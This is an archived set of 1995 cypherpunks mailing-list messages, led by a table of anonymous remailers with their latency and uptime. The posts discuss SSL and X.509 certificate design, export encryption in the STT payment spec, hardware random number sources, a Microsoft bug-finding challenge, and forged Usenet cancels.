usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

News: the remailer list has been rewritten, and the new version is
live! It should be more accurate, reliable, and faster than before.

Penet is back up! Enjoy.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
syrinx   syrinx@c2.org                    --+-+++----+    52:32 100.00%
ecafe    remail@ecafe.org                 *--********#     7:37  99.99%
alumni   hal@alumni.caltech.edu           *##*#**+#*##     2:47  99.99%
hacktic  remailer@utopia.hacktic.nl       *********+**     9:56  99.98%
gondolin mixmaster@gondolin.org           --+****+*--+  2:04:31  99.98%
robo     robo@c2.org                      #+###**+#*##      :59  99.98%
replay   remailer@replay.com              +**+*-++*++*    11:35  99.95%
bsu-cs   nowhere@bsu-cs.bsu.edu           #*#+###***-#     8:29  99.95%
mix      mixmaster@remail.obscura.com     -++---+---++  1:35:11  99.94%
flame    remailer@flame.alias.net         *****++**+**    23:08  99.93%
portal   hfinney@shell.portal.com         ##  ##*+#*##     2:03  99.79%
crown    mixmaster@kether.alias.net       ---+ --+-+-   1:18:05  99.70%
ideath   remailer@ideath.goldenbear.com   -.-.---.---  10:24:01  99.68%
extropia remail@extropia.wimsey.com       -.---.-----   8:06:45  99.54%
rmadillo remailer@armadillo.com           ++ +++++ ++     43:52  99.08%
vishnu   mixmaster@vishnu.alias.net         *+--*+ +**    20:36  98.79%
c2       remail@c2.org                      ++++++ +++    47:07  98.74%
spook    remailer@spook.alias.net         -----------   3:27:18  98.64%
penet    anon@anon.penet.fi               - ++-++--++   2:43:34  98.63%
hroller  hroller@c2.org                   #+###*   **#      :57  92.70%
rahul    homer@rahul.net                  **#****+###      2:05  99.52%
wmono    wmono@spook.alias.net                    ****     7:37  87.49%
ford     remailer@bi-node.zerberus.de     **+*#***+        6:37  68.05%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kerowe@ncsa.uiuc.edu (Kenneth E. Rowe)
Date: Mon, 2 Oct 95 06:16:32 PDT
To: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Subject: Re: DNS Security ( was Re: NetScape's dependence upon RSA down...)
Message-ID: <v02130502ac95bfa167d5@[141.142.150.60]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:58 PM 10/1/95, Donald E. Eastlake 3rd wrote:
>DNS security is an important point.  People not aware of efforts in this
>area may want to check out draft-ietf-dnssec-secext-05.txt which has
>more or less passed working group last call and is being considered by
>th Security Area Directory / IESG.  Reference code is also available
>(see message pasted at end below).
>
>Donald
But the proposed DNS extension itself does not deal with CRL and Key
Compromise Lists.

Ken.

-------------------------------------------------------------
Kenneth E. Rowe  (kerowe@ncsa.uiuc.edu)
Senior Security Engineer                (217) 244-5270 (Office)
        / Security Coordinator          (217) 244-0710 (NCSA IRST)
National Center for Supercomputing Applications
*** email ncsa-irst@ncsa.uiuc.edu for computer incident response ***






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 2 Oct 95 05:49:37 PDT
To: cypherpunks@toad.com
Subject: SAI_cya
Message-ID: <199510021249.IAA07948@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-2-95. W$Japer:


   "Internet Users Spooked About Spies' New Role."

      Web Review reported last week that the company in charge
      of assigning domain names, Network Solutions Inc., had
      been acquired by Science Applications International
      Corp., a closely held company which has many former
      intelligence and defense officials on its board. Web
      Review raised questions about whether SAIC is acting as
      camouflage for the government. Users of the Internet,
      which was originally created as a communications medium
      for Defense Department researchers, are reacting to the
      news with hostility. "I don't want a spook corporation,
      particularly a private spook corporation, to be anywhere
      near a control point on the global cooperative
      Internet," says James Warren.


   SAI_cya  (8 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Date: Mon, 2 Oct 95 09:19:56 PDT
To: Don.Stephenson@Eng.Sun.COM
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510021608.AA08689@pepper.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain


Don wrote:

>I haven't read the SSL spec for a while but my understanding was that 
>the server passed it's public key to the client via a certificate 
>signed by a mutually trusted certificate authority (i.e., Verisign).
>
>How would the filter be able to forge such a certificate ?

Why forge it? Why not simply buy a netsite server with a valid certificate.
Let's say you paid full list for it $5000. It is the classic MITM attack
but the protection against that attack was generally that the parties
communicating "knew" each other. 

This is a fundamental weakness of putting the security at the SSL level as
opposed to a possibly higher level. With the netscape attack since your
client never cares "how" (or to whom) the SSL connection is made, it never
shows you the information about where the source key came from. Only that
it is valid.

--Chuck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 2 Oct 95 09:19:04 PDT
To: aleph1@dfw.net (Aleph One)
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top stor
In-Reply-To: <Pine.SUN.3.90.951002104231.23045A-100000@dfw.net>
Message-ID: <199510021614.JAA19159@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	C2 status isn't worth anything. NT might be one of the only
OSes that ship C2-compliant, but just because it is C2 doesn't mean
it is secure.

> 
> BTW, I was just reading in LAN TIMES, I think, that Microsoft NT 3.5 is 
> about to be giving C2 status from the NCSC. They stated that it took over 
> a year to pass it. They also mention that Novell Netware is going the 
> same tests and it should have its C2 status in about 6 months to a year.
> Though you would like to know.
> 
> Aleph One / aleph1@dfw.net
> http://underground.org/
> KeyID 1024/948FD6B5 
> Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Mon, 2 Oct 95 01:27:02 PDT
To: cypherpunks@toad.com
Subject: Re: VISA and Microsoft STT Specs available
In-Reply-To: <199509291902.MAA23808@ix8.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.951002092117.12900A-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Sep 1995, Bill Stewart wrote:

> Some cryptographic high points, from a brief scan.
> - 1024-bit RSA signatures, using PKCS#1 format.
> - SHA 160-bit hashes
> - Symmetric bulk crypto includes two options (I haven't yet seen
>   how you choose between them; I assume it's export/domestic?)
                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>   == RC4/64 with 24 bits of salt leaving 40 bits of real key
>   == DES-CBC - yes, that's single-DES.  IV=0.

From http://www.windows.microsoft.com/windows/ie/stt.htm:

  NOTE: this document covers the International version of the STT 
  protocol, which includes DES encryption of all financial data, direct 
  RSA encryption of bank card account numbers, and 40 bit RC4 encryption 
  of the purchasing order form contents and receipt.  A US/Canada version 
  of the protocol with triple-DES encryption of the order, receipt, and 
  all financial data and direct RSA encryption of bank card account 
  numbers will be documented and published in the near future.

So it looks like single DES is now OK for export, at least it seems to be 
in this case where its application is strictly limited to "financial data".


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Oct 95 09:22:41 PDT
To: cypherpunks@toad.com
Subject: Re: Yet Another "(Fwd) Internet  Euro-Clipper"
Message-ID: <ac955e3205021004cb23@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:20 PM 10/2/95, Peter Trei wrote:

>For those curious about the latency, I'm posting this at 12:08, on the US
>east coast.
>How long did it take to reach you?

I got it at 09:14, Pacific Daylight Time, so there appears to be no lag.

I've generally found that lags are on my end, that my system (got.net
currently) is delaying mail from _all_ or _most_ mailing lists. (This was
particularly the case last week, when Cypherpunks mail stopped for many
hours at a time, then arrived out of sequence when my ISP was (presumably)
able to receive the resent mail.)

>> Not to pick on Peter Trei, as this happens all the time, whenever a hot
>> issue appears.
>
>Short of implementing some content-sensitive form of CSMA/CD, I don't see
>what we
>can do (but lowering the list latency would help a lot).

Well, the main issue with the "Europe to Ban Crypto" reposts was that
several people reposted the same press release over a period of several
days, and the case I cited here was  where it was posted a week later. I
can't see how a latency, even a serious latency of several hours, could
cause this to happen.

Mostly I think people should try to first of all, _write original stuff_.
That is, write their own analyses of things. Their own essays, reactions,
etc. Then, secondarily, post pointers to longer stuff. Thirdly, and less to
be desired, forward articles.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Mon, 2 Oct 95 06:48:42 PDT
To: cypherpunks@toad.com
Subject: Re: Restrictions on Munitions _Imports_
In-Reply-To: <ac94bc7800021004cb78@[205.199.118.202]>
Message-ID: <m0szlG7-0004MhC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

: I don't expect that any specific _crypto_ import licenses exist, but
: certainly various kinds of _munitions_ import licenses exist (improperly,
: in my opinion, of course).
. . . . 
: Given that crypto is classified as "munitions" for the purpose of export
: control (including the ITARs), it would not surprise me in the least if the
: same sorts of restrictions on imports of the aforementioned munitions are
: not applied to at least some crypto imports. If not now, soon. (Given that
: many folks are talking about a strategy that has been apparent for many
: years: develop core crypto in less hostile environments than the U.S.)
: 
: I can't cite a specific law affecting crypto imports at this time--and I
: doubt any crypto products have been affected so far--but clearly there are
: restricitions on imports of ammunition, guns, missiles, jet fighters,
: and--maybe soon--on "crypto munitions."

There is a United States Munitions List for imports that is
administered by the Treasury Department, but cryptographic devices and
software are not included on that list.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Oct 95 09:38:23 PDT
To: cypherpunks@toad.com
Subject: My goof on toad.com lags...
Message-ID: <ac9562b109021004d9db@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


A few minutes ago I wrote:

---

At 12:20 PM 10/2/95, Peter Trei wrote:

>For those curious about the latency, I'm posting this at 12:08, on the US
>east coast.
>How long did it take to reach you?

I got it at 09:14, Pacific Daylight Time, so there appears to be no lag.

---

Well, before you all correct me, yes, I now realize it was my copy, sent
directly to me, that I received.

As of 09:35 I haven't received the toad.com-delivered copy.

But my point remains that many times the lags are on local ISP systems, not
necessarily on toad.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 2 Oct 95 08:52:45 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <199510012022.OAA07852@nag.cs.colorado.edu>
Message-ID: <aPkccD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bryce Wilcox <wilcoxb@nag.cs.colorado.edu> writes:
> I've had a look at the web site and it looks really interesting.  It would
> make a great project if a bunch of cypherpunks installed NoCeM and then piped
> the list to a newsgroup.  We could then develop reputation servers to help us
> use NoCeM, start charging cyberbucks for our recommendations, and, in short,
> make cpunks into a slightly larger outpost in Cyberlibertaria.  (a.k.a. The
> Free Net)

This sounds like a very good idea to me too. 

:)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 2 Oct 95 10:13:58 PDT
To: Carl Ellison <cme@tis.com>
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510021713.KAA15419@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott M Fabbri <m1smf99@FRB.GOV>
Date: Mon, 2 Oct 95 07:18:31 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Debt currency
In-Reply-To: <199509300658.XAA03050@blob.best.net>
Message-ID: <9510021419.AA06092@arcss5.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain


> In addition to being totally off topic and spamming lots of lists, 
> Terra Libra is selling Ponzi schemes and pyramid schemes.
> 
> This is just "make money fast" elaborately dressed in libertarian
> rhetoric.
> 
> 
> At 07:11 AM 9/28/95 +0100, Anonymous wrote:
> >   This is the best description of debt currency I've seen. Debt currency
> >is today's most effective form of slavery. It is today's American slavery.

Well, I got a kick out of it. Too bad it's mostly wrong. :-)

--
Scott Fabbri                                  m1smf99@frb.gov
I don't speak for the Federal Reserve Board. Mr. Greenspan does, and we're 
both pretty happy about the status quo.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 2 Oct 95 07:33:50 PDT
To: cypherpunks@toad.com
Subject: `Hack Microsoft' challenge is NYT Computer News Daily's top story
Message-ID: <9510021434.AA14336@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


See http://nytsyn.com/live/Lead/275_100295_074418_19095.html

  MICROSOFT BECOMES NEW TARGET OF HACKING CHALLENGE (10/2) 

  By HEATHER GREEN c.1995 Bloomberg Business News 

  BERKELEY, Calif. -- Microsoft Corp. has been chosen as a new target
  for computer hackers.

  Community Connexion, an Internet service provider that last week
  promised a free T-shirt to anyone who found a flaw in Netscape
  Communications Corp.'s software, extended the challenge Friday to
  include holes in Microsoft products.

  . . .

The article quotes Sameer and includes the URL http://www.c2.org/hackmsoft/

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Mon, 2 Oct 95 08:47:23 PDT
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
In-Reply-To: <9510021434.AA14336@cfdevx1.lehman.com>
Message-ID: <Pine.SUN.3.90.951002104231.23045A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


BTW, I was just reading in LAN TIMES, I think, that Microsoft NT 3.5 is 
about to be giving C2 status from the NCSC. They stated that it took over 
a year to pass it. They also mention that Novell Netware is going the 
same tests and it should have its C2 status in about 6 months to a year.
Though you would like to know.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 2 Oct 95 08:15:50 PDT
To: stewarts@ix.netcom.com
Subject: Re: X.509, S/MIME, and evolution of PGP
In-Reply-To: <199509292140.OAA27151@comsec.com>
Message-ID: <9510021511.AA10057@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 27 Sep 1995 15:22:08 -0700
>From: Bill Stewart <stewarts@ix.netcom.com>

Bill,

>I'd always heard X.509 public key certificates were a hierarchical, evil,
>anti-WebOfTrust ISOism.  But Netscape is now doing them, and talking S/MIME,
>so I sat down to read the specs, and they're really not all that bad.  

I was all set to scream, when I read this first sentence.  Then I read on.

>(Technically, I've only read PKCS#6 and RFC 1422, and not the real ISOisms...)
>Yeah, they've got lots of clunky ASN.1 Ambiguous Encoding Rules and X.500 
>Silly Name Format, but those can be lived with, and the X.500 may be possible
>to simply ignore in most cases.

At this point, I realized that we agree in evaluation but not in weighting.

Twice now, I have had to deal with X.509 certificates in real code and it
is excruciatingly painful -- especially for someone, like me, with some
background in performance engineering and much background in software
engineering.

ASN.1 is not merely ambiguous, it is actively wrong as part of a design
methodology.  It encourages people to define structures in the BNF style --
and they do (witness X.509).  When you translate this into C or PASCAL
structures by an automatic translator, you end up with structures whose
definitions are nested so deeply that even with short field names you would
have variable names which occupy a substantial part of a line of text.
However, ASN.1's BNF-ness encourages people to use
longNamesWithEmbeddedCapitals -- so you end up with variable names which
turn routine C function calls into multi-line, unreadable blocks.

You also end up with too much code.  I recently had to deal with X.509
certs for an authentication application (a firewall proxy).  The proxy was
about 30KB of code prior to the ASN.1.  The ASN.1 code, just to do packing
and parsing, was over 100KB (.o file sizes, in both cases).

You also end up with too many bytes being transferred.  I worked out an
example of ASN.1 abuse -- defining a triple-DES key structure for
encrypting and transmittal -- as a raw C structure (following long
established practice and performance engineering (an array of unsigned
char, with offsets for each key and the IV)) and as ASN.1 (following modern
ASN.1 practice).  The raw C structure was 32 bytes long.  The ASN.1
structure was 86 bytes.  Worse was the code dedicated to structure
definition and packing/unpacking.  In the raw C case, it took 48 ASCII
characters to define the structure and its offsets (including comments) and
nothing to pack/unpack.  With ASN.1, it took 55085 characters of
definition, pack and unpack code.  This is a factor of 1148 in source code
expansion.

		--------------------------------

I could go on at length, and have in other fora.  Not only is ASN.1 clearly
the work of Satan, the Distinguished Name definition is more than a victim
of ASN.1 generality, it is a clear reason for the unpopularity of systems
which use it.  Do you remember when X.400 names started showing up in
e-mail (e.g., with Lotus Notes).  How many of those names do you see now?
It didn't work.  The concept is flawed -- but it lives on in X.509.  [It
reminds me of a flaky grad student's idea of a way to do things -- elevated
to standard before people had the chance to try it and discover how
completely bogus it was.]


It is possible to implement something which reads and writes ASN.1 -- but
it is ugly, it inflates your code and it hurts your runtime.  I would like
to see as many hold-outs against ASN.1 and Distinguished Names as possible.

PGP is one such.  TIS/MOSS has learned its lesson (from PEM days) and is
making all of the ASN.1 and DN stuff (X.509) optional.  With luck, the
X.509 parts will die away (although MOSS was retarded so strongly in the
PEM days that it may never recover -- may never acquire the market share to
make it a force).  I would strongly encourage others to join the battle.

This might not be easy.  It is clear that there is an ASN.1 juggernaut.  It
is taking over all sorts of standards.  I believe I know why.  It makes the
job of the standards writer easier.  However, I also believe it needs to be
fought...not merely to save future S/W development efforts from the waste
and abuse which ASN.1 creates, but also to take a stand against the process
by which non-implementors get together on standards committees and come out
with standards which preclude good software architectures -- and who, in a
kind of old-boy-network, endorse other standards (e.g., the ISO set) as
part of their own.  Such a design process is destructive.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Dittrich <dittrich@cac.washington.edu>
Date: Mon, 2 Oct 95 11:17:56 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
Message-ID: <9510021817.AA01271@red2.cac.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Perry writes, regarding alpha decay counts for random numbers:
> 
> > And, as I noted, there are RS232 interfaceable radiation detectors you
> > can buy off the shelf -- no hardware hacking needed.
> 
> As far as a radiation source goes, the Americium 241 source from a cheap
> smoke detector is just dandy. A while ago, I took one into the lab and
> put it on a scintillating counter and got alpha hits at roughly
> half-microsecond intervals. It was a while ago, so I forget how this compared
> to the rating in Curies on the package. But that would be fine for a
> low-to-moderate bandwidth RNG.

I was thinking about this the other day and wondered if it wouldn't be
cheap and relatively easy to build a board that samples and sums
several randomly selected signals on various frequencies on the AM
broadcast spectrum.  This should catch stations in nearly all
metropolitan (and most rural areas as well) and would require that
someone be able to broadcast at multiple frequencies to "cheat" it.

Perhaps this would be affected by RF interference from the motherboard
itself.  If so, could the RF radiation from the motherboard itself be
used to generate random numbers?

-- 
Dave Dittrich                  Client Services, Computing & Communications
dittrich@cac.washington.edu    University of Washington

<a href="http://www.washington.edu/People/dad/">
Dave Dittrich / dittrich@cac.washington.edu</a>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 2 Oct 95 08:57:01 PDT
To: cypherpunks@toad.com
Subject: Certificate proposal
Message-ID: <9510021553.AA13756@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

X.509 certificates are not totally bad.  Their structure contains lessons
for anyone designing a certificate structure.  [Raw X.509 does not imply a
hierarchy, I believe.  Steve Kent & Co. do.]

However, there are also some serious problems with X.509 certs, aside from
their use of ASN.1.

Perhaps the biggest problem is the use of a name -- a text string (or some
abortion like the DN which can be reduced to a text string) -- as the
anchor point.

This anchor point needs to be unique.  Since it is just a text string, that
means that the certificate authority needs to guarantee uniqueness.
However, it is also supposed to stand for a unique individual.  Since it is
not that individual's DNA sequence -- it is not testable.  There has to be
machinery set up outside the certificate definition for binding this text
string to its individual.

		------------------------------

PGP certificates have the same problem.  In that case, it is an e-mail
address and name (by tradition) as the text string.  That needs to be bound
to some physical body.  If it is an e-mail name, there is some binding
enforced by whatever access mechanisms protect access to that e-mail
account.  However, that binding is weak and also outside the certificate
definition.

		------------------------------

Let me propose an alternative unique name: the public key (or a good hash
of it).  The public key has an advantage over both X.509 and PGP names.
The binding between it and its human being is testable.  You can challenge
the human in question to sign something.



Assuming you use a public key as the unique name, you end up with a much
simplified certificate.  In fact, the notion of "certificate" may go away,
in the sense that the certificate binds a key to a person through a unique
name.  The person binds himself to his key, on challenge (or on any message
signature).

What remains is a need for attributes to be bound to a key.  For example,
someone might testify that E0414C79B5AF36750217BC1A57386478 has brown hair,
is balding and wears a pony tail, by signing a message to that effect.
Someone else might sign a message stating that the person who owns the
private key of 61E2DE7FCB9D7984E9C8048BA63221A2 is authorized to spend
money from bank account number 07123 of Provident Savings in Columbia MD.
That latter signator needs to be verified as authorized to make such an
assertion -- and you end up with a certification chain -- but it is not
hierarchical like X.509 and it is not web-of-trust -- it is relational.  It
is not a chain binding key to person but key's person to attribute or
permission.  It goes directly to what we need to accomplish without the
middleman -- without stopping at a person in the middle.

I realize that if you want to revoke a key, then it might help to have
bindings be to something other than the key.  That way, you can change keys
out from under the binding.  However, every method I've examined for
accomplishing that has security weaknesses.  The best method I've found yet
has a very long signature key -- used only rarely (e.g., when acquiring an
attribute-certificate worth a great deal; and signing more transient keys) --
and never normally revoked (or, if revoked, causing a widespread
re-establishment of bindings -- like when you lose your wallet today).

		------------------------------

Current certificates are going down a fundamentally wrong path.  They are
trying to bind keys to people and let Society somehow bind attributes to
people -- but the latter binding is too weak to permit keys to be bound to
attributes or permissions.

The community will discover this, soon, but the farther we play along the
X.509 path (especially, but also the PGP path), the more inertia there will
be to overcome in trying to fix this problem.  I would therefore suggest
that the PGP development process address this issue now and continue the
established habit of taking the lead into sanity.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHAK8FQXJENzYr45AQFsdAP+JswAq/H4JIDE3+VlMsi87PBPCNBA7jg7
0ftkd8v7vrSSNda5aF+HVB7oKHylA/Lb90bvjMK7CKOJJ7aTzRP9IsAiz1i48FAR
LAeD59v5SAKmAhaTMMYSRyKFRRXEaqIdEoJW3XKQBJ57b8R38vWKjR/11eTtCKjV
joH4c5hhWmY=
=ayYh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Mon, 2 Oct 95 08:55:20 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: More forged cancels (fwd)
Message-ID: <Pine.SUN.3.91.951002115347.17004B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


why is my mailbox full of stuff from mail.cypherpunks? 

****   PLEASE NOTE NEW E-MAIL ADDRESS: froomkin@law.miami.edu *********

A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate
Professor of Law | U. Miami School of Law | froomkin@law.miami.edu P.O.
Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA
| New address, but it's still just as hot here. 

---------- Forwarded message ---------- Received: from relay3.UU.NET by
law.miami.edu (4.1/3.1.012693-University of Miami Law School); 
        id AA16017 for IFS=' '&&exec /home/faculty/froomkin/proc/procmail
-t -f-||exit 75 #froomkin; Mon, 2 Oct 95 01:17:37 EDT Received: from
toad.com by relay3.UU.NET with SMTP
	id QQzjqz13374; Mon, 2 Oct 1995 01:16:43 -0400 Received: by
toad.com id AA17355; Sun, 1 Oct 95 22:13:04 PDT Received: from
hudson.lm.com by toad.com id AA17346; Sun, 1 Oct 95 22:12:56 PDT Received:
(from news@localhost) by hudson.lm.com (8.6.11/8.6.9) id BAA09549 for
cypherpunks@toad.com; Mon, 2 Oct 1995 01:15:28 -0400 Path:
hudson.lm.com!news.math.psu.edu!news.cac.psu.edu!newsserver.jvnc.net!newsserver2.jvnc.net!howland.reston.ans.net!gatech!news.mathworks.com!newsxfer.itd.umich.edu!agate!news.Stanford.EDU!nntp-hub2.barrnet.net!news1.digital.com!decwrl!amd!netcomsv!uucp3.net
>From: orbit@ix.netcom.com (Michael R. Grabois) Newsgroups:
news.admin.net-abuse.misc,soc.culture.german,soc.culture.jewish,rec.radio.shortwave,alt.2600,mail.cypherpunks,alt.privacy.anon-server,alt.stop.spamming,alt.stop-spamming
Subject: Re: More forged cancels Date: Mon, 02 Oct 1995 03:31:03 GMT
Organization: Netcom Lines: 40 Message-Id:
<44nmd0$q13@ixnews6.ix.netcom.com> References:
<44n926$2dj@sundog.tiac.net> Reply-To: orbit@ix.netcom.com
Nntp-Posting-Host: ix-hou6-03.ix.netcom.com X-Netcom-Date: Sun Oct 01
8:30:40 PM PDT 1995 X-Newsreader: Forte Free Agent 1.0.82 Xref:
hudson.lm.com news.admin.net-abuse.misc:16173 soc.culture.german:76152
soc.culture.jewish:188004 rec.radio.shortwave:63171 alt.2600:125976
mail.cypherpunks:18586 alt.privacy.anon-server:4465 Apparently-To:
cypherpunks@toad.com Sender: owner-cypherpunks@toad.com Precedence: bulk

On Sun, 01 Oct 1995 23:45:24 GMT, jbyrd@tiac.net (Jim Byrd) wrote: 

[snip]

>-----------------begin control message
>Path:
>sundog.tiac.net!news.sprintlink.net!in2.uu.net!sunic!mn6.swip.net!seunet!news2..swip..net!plug..ne
>ws.pipex.net!pipex!tank.news.pipex.net!pipex!usenet.eel.ufl.edu!news.gmi..edu!msunews!netnew
>s.upenn.edu!ts7-28.upenn.edu!user
>From: 73323.603@compuserve.com
>Newsgroups: soc.culture.german,soc.culture.jewish
>Subject: cmsg cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
>Date: Sun, 1 Oct 1995 17:56 GMT
>Organization: The National Alliance
